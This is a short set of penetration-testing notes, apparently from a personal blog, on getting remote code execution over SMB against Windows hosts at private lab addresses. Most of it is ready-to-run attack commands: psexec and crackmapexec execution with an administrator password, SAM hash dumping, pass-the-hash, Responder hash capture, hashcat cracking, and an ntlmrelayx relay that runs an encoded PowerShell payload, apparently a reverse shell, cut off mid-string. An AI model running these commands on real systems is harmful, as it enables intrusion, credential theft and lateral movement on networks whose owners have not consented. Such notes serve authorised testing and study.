Smb

RCE

Notes and commands for RCE.

2025-05-29

Tags networksmbrce

If on windows we can use impacket or crackmapexec to run commands on PowerShell / cmd on windows machine

impacket-psexec -h

1
impacket-psexec administrator:'Password123!'@10.10.110.17

-x for normal shell and -X for PowerShell

1
crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

if multiple ppl share same admin ->

1
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users

1
crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam

1
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

Sniffing for hashes: setting up a responder which listens for a “misstype” on the broadcast for hashes sudo responder -I ens33

stored in /

1
usr/share/responder/logs/

1
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

SMB poisonung

1
2
cat /etc/responder/Responder.conf | grep 'SMB ='
	SMB = Off

Using impacket to poison the response and execute a PowerShell command with -c flag: https://www.revshells.com/

1
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c ‘powershell -e JABjAGwAaQBlAG4AdAAgA

’